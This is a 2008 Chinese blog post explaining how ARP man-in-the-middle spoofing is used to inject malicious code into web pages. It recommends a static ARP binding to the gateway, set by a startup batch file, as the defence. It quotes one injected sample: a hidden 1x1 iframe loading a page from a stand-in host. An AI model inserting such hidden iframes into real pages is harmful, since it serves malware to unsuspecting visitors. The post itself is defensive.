12月 20th, 2008

防御arp欺骗挂马的方法

Category: 网络应用, 服务器, Author: admin, Popularity: 22%

网页被挂马后,不管是访问服务器上的任何网页,就连404的页面也会在<html>后加入:

<IFRAME SRC=http://www.aaaa.com/a.htm width =1 height=1 frameborder=0></IFRAME>;,挂马的位置在html标记左右,上面这段恶意代码,它会每隔几秒加入代码,也就是说在输出具体的东西之前就被挂了,有时有有时又没有,不是网页源代码问题,也没有在网页源代码中加入恶意代码,即使重装服务器,格式化重分区过第一个硬盘,放上去网站没多久一样再会出现这种情况.

这大体可以确定是受到了arp欺骗攻击.

arp欺骗攻击原理:arp中间人攻击,实际上相当于做了一次代理。

正常时候: A—->B ,A是访问的正常客户,B是要攻击的服务器,C是被控制的宿主主机

arp中间人攻击时候: A—->C—->B         B—->C—->A

实际上,C在这里做了一次代理的作用

那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如 <iframe>…之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了.

防御arp欺骗挂马的方法

最简单的办法就一命令OK,实现与网关绑定,比如网关是 192.168.0.1 比如网关MAC 00-00-00-00-00,好了我们直接用记事本保存代码为arp -s 192.168.0.1 00-00-00-00-00 然后保存,改后缀名为.bat 加入到服务器启动项,目前ARP攻击猖獗,ARP的目前为一的完美解决方案就是实现 本机与网关的双向绑定。所谓ARP防火墙,只是起到暂时保护的作用,以上方法可以有效的防止服务器被人ARP挂马。

相关日志

Tags:, .
评论数量() | Add Comments
本文网址:http://www.9usb.net/200812/arp-qipian-2.html

There are No comments.

» You can leave a response

leave a reply